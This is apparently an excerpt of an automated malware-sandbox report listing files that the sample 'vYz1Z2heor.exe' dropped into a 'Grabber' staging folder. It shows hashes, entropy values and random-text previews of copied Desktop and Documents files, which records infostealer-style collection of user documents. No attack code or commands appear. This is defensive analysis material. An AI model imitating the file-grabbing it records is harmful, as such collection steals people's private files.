                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:true
                                                            Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\ZGGKNSUKOP.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):282
                                                            Entropy (8bit):3.514693737970008
                                                            Encrypted:false
                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                            MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                            SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                            SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                            SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW\DUUDTUBZFW.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW\EWZCVGNOWT.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
